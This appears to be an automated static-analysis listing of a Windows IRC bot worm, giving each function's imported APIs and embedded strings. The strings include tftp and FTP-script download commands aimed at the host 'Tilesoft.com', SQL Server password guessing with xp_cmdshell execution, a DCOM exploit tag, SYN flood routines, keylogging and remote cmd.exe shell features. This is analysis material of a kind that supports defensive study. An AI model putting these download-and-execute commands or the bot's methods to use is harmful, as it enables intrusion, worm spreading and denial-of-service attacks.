sub_outside(): KERNEL32.GetLocalTime KERNEL32.Sleep WS2_32.socket WS2_32.gethostbyname WS2_32.inet_addr WS2_32.htons WS2_32.connect WS2_32.send WS2_32.shutdown WS2_32.closesocket WS2_32.WSAStartup WS2_32.setsockopt WS2_32.ioctlsocket WS2_32.bind WS2_32.listen WS2_32.select WS2_32.__WSAFDIsSet WS2_32.accept WS2_32.recv WS2_32.WSACleanup KERNEL32.FindFirstFileA KERNEL32.FindNextFileA KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error KERNEL32.CreateFileA KERNEL32.SetFilePointer KERNEL32.ReadFile KERNEL32.CloseHandle KERNEL32.GetTickCount KERNEL32.ExitProcess KERNEL32.GetLocaleInfoA KERNEL32.GetVersionExA KERNEL32.GetVersion KERNEL32.LCMapStringW KERNEL32.MultiByteToWideChar KERNEL32.WideCharToMultiByte KERNEL32.UnhandledExceptionFilter KERNEL32.GetStringTypeW |
sub_41DF39(0126): KERNEL32.SetUnhandledExceptionFilter |
sub_40C30C(019e): "%sKB" "failed" |
sub_40A996(04c3): KERNEL32.GetTickCount "%dd %dh %dm" |
sub_41454F(04fb): KERNEL32.CreateThread KERNEL32.Sleep KERNEL32.CloseHandle |
sub_40283D(0675): WS2_32.inet_addr WS2_32.htons WS2_32.socket WS2_32.connect WS2_32.recv WS2_32.send KERNEL32.Sleep WS2_32.closesocket "Tilesoft.com" "sf." "sf" "78001" "echo open %s %d >> eq&echo user %s %s >"... |
sub_41CEF9(0715): "..." "Runtime Error!\n\nProgram: " "\n\n" "Microsoft Visual C++ Runtime Library" |
sub_413074(0b6c): NTDLL.RtlGetLastWin32Error "The following Windows services are regi"... " Unknown" " Paused" " Pausing" " Continuing" " Running" " Stoping" " Starting" " Stopped" "%s: %s (%s)" |
sub_41E6CE(0e35): KERNEL32.LoadLibraryA "user32.dll" "MessageBoxA" "GetActiveWindow" "GetLastActivePopup" |
sub_4036EB(10b8): KERNEL32.Sleep "Tilesoft.com" "tftp -i %s get %s\r\n" "echo open %s %d > o&echo user 1 1 >> o "... |
sub_407636(22a3): "%d.%d.%d.%d" |
sub_40AD69(23e7): "[NETINFO]: [Type]: %s (%s). [IP Address"... |
sub_4149C4(2870): "Software\\Microsoft\\OLE" "EnableDCOM" "SYSTEM\\CurrentControlSet\\Control\\Lsa" "restrictanonymous" "%c$" "%c:\\" |
sub_406A16(2b64): KERNEL32.CreateFileA KERNEL32.SetFilePointer KERNEL32.ReadFile KERNEL32.CloseHandle |
sub_40AAB5(2cf5): KERNEL32.GetVersionExA "95" "NT" "98" "ME" "2K" "XP" "2003" "couldn't resolve host" "dd:MMM:yyyy" "HH:mm:ss" "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"... |
sub_41F825(2ded): KERNEL32.CompareStringW KERNEL32.CompareStringA KERNEL32.MultiByteToWideChar |
sub_419ECF(2e75): "KERNEL32" "IsProcessorFeaturePresent" |
sub_41D53A(30b8): KERNEL32.CreateFileA KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error |
sub_40B43D(3339): "rb" |
sub_41E82C(38ba): NTDLL.RtlGetLastWin32Error |
sub_4133A6(3fe3): "Share name: Resource: "... "Yes" "No" "%-14S %-24S %-6u %-4s" |
sub_403178(40e5): "Tilesoft.com" "FXNBFXFXNBFXFXFXFX" |
sub_41C8B3(4558): "C:\\m_unpacker\\packed.exe" |
sub_414047(4a23): KERNEL32.CloseHandle |
sub_419FF6(502f): "e+000" |
sub_418A63(55e5): KERNEL32.HeapCreate KERNEL32.HeapDestroy |
sub_418B08(597c): KERNEL32.VirtualFree NTDLL.RtlFreeHeap |
sub_4033CB(5b94): KERNEL32.CreateFileA KERNEL32.CloseHandle KERNEL32.ReadFile KERNEL32.Sleep |
sub_415E1D(5c3f): NTDLL.RtlFreeHeap |
sub_40484C(5f99): "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"... |
sub_41BB5F(6091): KERNEL32.SetFilePointer NTDLL.RtlGetLastWin32Error |
sub_402988(60ad): WS2_32.htons WS2_32.send WS2_32.recv KERNEL32.Sleep |
sub_41E757(60b5): NTDLL.RtlAllocateHeap |
sub_41EFE4(6338): "1#SNAN" "1#IND" "1#INF" "1#QNAN" |
sub_4191ED(64eb): KERNEL32.VirtualAlloc |
sub_41E142(65fe): KERNEL32.WideCharToMultiByte "TZ" |
sub_41D16F(66df): KERNEL32.WideCharToMultiByte |
sub_41AC28(6954): NTDLL.RtlSizeHeap |
sub_413DB8(6c54): KERNEL32.CloseHandle "SeDebugPrivilege" " %s (%d)" "SeDebugPrivilege" |
sub_40776F(6d05): KERNEL32.GetTickCount NTDLL.RtlEnterCriticalSection NTDLL.RtlLeaveCriticalSection KERNEL32.Sleep "dcom135" |
sub_40446E(6e81): WS2_32.select WS2_32.__WSAFDIsSet |
sub_407D6A(6eca): KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error |
sub_408884(6f69): KERNEL32.FindFirstFileA KERNEL32.FindNextFileA "%s\\*" "%s\\%s" " Found: %s\\%s" |
sub_407983(6f89): NTDLL.RtlDeleteCriticalSection KERNEL32.InitializeCriticalSectionAndSpinCount KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error |
sub_414376(71f8): KERNEL32.GetTickCount "mIRC" |
sub_40A59D(7918): KERNEL32.CloseHandle |
sub_412EF6(79f8): "The specified service name is invalid." "The requested control code is undefined"... "The handle is invalid." "The handle does not have the required a"... "The service binary file could not be fo"... "The service cannot be stopped because o"... "The database is locked." "A thread could not be created for the s"... "The process for the service was started"... "The requested control code is not valid"... "An instance of the service is already r"... "The system is shutting down." "An unknown error occurred: <%ld>" |
sub_41410C(7e76): KERNEL32.GetTickCount |
sub_41C40A(8026): NTDLL.RtlGetLastWin32Error |
sub_413D4D(8091): KERNEL32.CloseHandle |
sub_41FD90(822d): "string too long" |
sub_41FFBC(822d): "invalid string position" |
sub_402FDD(840c): KERNEL32.MultiByteToWideChar "\\IPC$" "\\\\" |
sub_4185AB(84ec): KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error |
sub_415207(8732): "%s: %s stopped. (%d thread(s) stopped.)"... "%s: No %s thread found." |
sub_41360D(893c): "Account: %S" "Full Name: %S" "User Comment: %S" "Comment: %S" "Unknown" "Administrator" "User" "Guest" "Privilege Level: %s" "Auth Flags: %d" "Home Directory: %S" "Parameters: %S" "Password Age: %d" "Bad Password Count: %d" "Number of Logins: %d" "Last Logon: %d" "Last Logoff: %d" "Logon Server: %S" "Country Code: %d" "User's Language: %d" "Max. Storage: %d" |
sub_416348(8af0): NTDLL.RtlUnwind |
sub_413270(8cdb): KERNEL32.WideCharToMultiByte |
sub_409C76(8e50): KERNEL32.GlobalLock KERNEL32.GlobalUnlock |
sub_4030C0(90cb): KERNEL32.MultiByteToWideChar KERNEL32.Sleep "\\IPC$" "\\\\" |
sub_4176E9(91cb): KERNEL32.GetFileAttributesA NTDLL.RtlGetLastWin32Error |
sub_405B07(95cc): "GET " " " "\r\n" |
sub_4179D9(95ea): KERNEL32.MultiByteToWideChar NTDLL.RtlGetLastWin32Error |
sub_4059F0(9713): WS2_32.WSAStartup WS2_32.socket WS2_32.inet_addr WS2_32.htons WS2_32.connect WS2_32.closesocket WS2_32.WSACleanup |
sub_40A387(9819): KERNEL32.GetTickCount KERNEL32.Sleep |
sub_41DFAD(9a80): KERNEL32.MultiByteToWideChar |
sub_413B5B(9bb4): "Invalid parameter." "Server name not found." "This network request is not supported." "Not enough memory." "The name is invalid." "Duplicate share name." "Invalid for redirected resource." "Device or directory does not exist." "Level parameter is invalid." "A general failure occurred in the netwo"... "The operation is allowed only on the pr"... "The user account already exists." "The group already exists." "The password is shorter than required ("... "An unknown error occurred." "The computer name is invalid." "Share not found." "The user name could not be found." "Network connection not found." |
sub_401BD6(9cde): KERNEL32.GetTickCount "syn" "ack" "random" |
sub_409DD7(9dbe): "SeShutdownPrivilege" |
sub_4178DC(a10d): NTDLL.RtlGetLastWin32Error |
sub_40460C(a2f7): WS2_32.send |
sub_407119(a6b1): " %s: %d," " Total: %d in %s." |
sub_40A9FF(a7c4): KERNEL32.Sleep |
sub_4139DB(a909): "Username accounts for local system:" " %S" "Total users found: %d." |
sub_412E54(a9bc): NTDLL.RtlGetLastWin32Error |
sub_409CB1(aafd): "mIRC" |
sub_4140AE(ac14): KERNEL32.GetTickCount "%s" |
sub_409663(ac3c): "Kernel32.dll failed. <%d>" "User32.dll failed. <%d>" "Advapi32.dll failed. <%d>" "Gdi32.dll failed. <%d>" "Ws2_32.dll failed. <%d>" "Wininet.dll failed. <%d>" "Icmp.dll failed. <%d>" "Netapi32.dll failed. <%d>" "Dnsapi.dll failed. <%d>" "Iphlpapi.dll failed. <%d>" "Mpr32.dll failed. <%d>" "Shell32.dll failed. <%d>" "Odbc32.dll failed. <%d>" "Avicap32.dll failed. <%d>" |
sub_407BE2(ad7c): KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error |
sub_4201E9(aeff): KERNEL32.RaiseException |
sub_417BF3(af5c): KERNEL32.ExitProcess |
sub_413342(afa1): KERNEL32.MultiByteToWideChar |
sub_40C27B(b2db): "RAM" "Cdrom" "Network" "Disk" "Invalid" "Unknown" |
sub_409F81(b885): KERNEL32.CreateFileA "@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"... "c:\\ab3.bat" |
sub_40CB59(bc9b): KERNEL32.Sleep |
sub_40CCC1(c24e): KERNEL32.Sleep "PASS %s\r\n" |
sub_412D32(c35a): KERNEL32.Sleep "NOTICE" "PRIVMSG" "%s" |
sub_41B969(c6bf): KERNEL32.ReadFile NTDLL.RtlGetLastWin32Error |
sub_402DDD(c7bf): WS2_32.inet_addr WS2_32.htons WS2_32.socket WS2_32.connect WS2_32.send WS2_32.recv WS2_32.closesocket |
sub_40B392(c8ef): "Topic Soft" |
sub_41CB00(cb46): KERNEL32.GetEnvironmentStringsW KERNEL32.GetEnvironmentStrings KERNEL32.WideCharToMultiByte KERNEL32.FreeEnvironmentStringsW |
sub_4160A4(cba9): NTDLL.RtlUnwind |
sub_41913C(cbe8): NTDLL.RtlReAllocateHeap NTDLL.RtlAllocateHeap KERNEL32.VirtualAlloc NTDLL.RtlFreeHeap |
sub_409DF9(d219): KERNEL32.CreateFileA KERNEL32.GetFileAttributesA "%sdel.bat" "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"... "%%comspec%% /c %s %s" |
sub_4196C9(d2f6): KERNEL32.RaiseException |
sub_4174BF(d50c): NTDLL.RtlAllocateHeap NTDLL.RtlReAllocateHeap |
sub_41DF28(d8fa): KERNEL32.SetUnhandledExceptionFilter |
start(dabc): KERNEL32.GetTickCount |
sub_40C4F9(dc5b): "A:\\" |
sub_40A155(e076): "%d.%d.%d.%d" |
sub_406B01(e1a1): "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"... |
sub_4051A0(e422): KERNEL32.Sleep "Tilesoft.com" "echo open %s %d > o&echo user 1 1 >> o "... |
sub_418A9F(e71f): NTDLL.RtlAllocateHeap |
sub_4089D6(eb03): KERNEL32.GetModuleHandleA NTDLL.RtlGetLastWin32Error KERNEL32.LoadLibraryA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "GetAsyncKeyState" "GetKeyState" "GetWindowTextA" "GetForegroundWindow" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "OpenSCManagerA" "OpenServiceA" "ControlService" "CloseServiceHandle" "EnumServicesStatusA" "IsValidSecurityDescriptor" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "icmp.dll" "IcmpCreateFile" "IcmpCloseHandle" "IcmpSendEcho" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" "avicap32.dll" "capCreateCaptureWindowA" "capGetDriverDescriptionA" |
sub_40384C(ec29): KERNEL32.Sleep |
sub_40B151(edda): KERNEL32.GetLocalTime "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" |
sub_4085B7(ef39): "%s\\%s" "r" "=" "=" |
sub_4060E4(f006): KERNEL32.GetFileAttributesA KERNEL32.CreateFileA KERNEL32.CloseHandle KERNEL32.CreateThread KERNEL32.Sleep NTDLL.RtlGetLastWin32Error "\\%s" "%s" "%s%s" "\n" "*" |
sub_404108(f1cc): "BBBB" "CCCC" |
sub_40A7E1(f4ac): KERNEL32.CreatePipe KERNEL32.GetCurrentProcess KERNEL32.CloseHandle KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error "cmd.exe" |
sub_40C427(f5ac): "failed" |
sub_415DE7(fd6e): NTDLL.RtlAllocateHeap |
sub_41F7B7(fe6c): KERNEL32.WideCharToMultiByte |
sub_404F08(fecb): KERNEL32.Sleep "sa" "root" "admin" "Tilesoft.com" "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"... "EXEC master..xp_cmdshell 'del eq&echo o"... "EXEC master..xp_cmdshell '%s'" |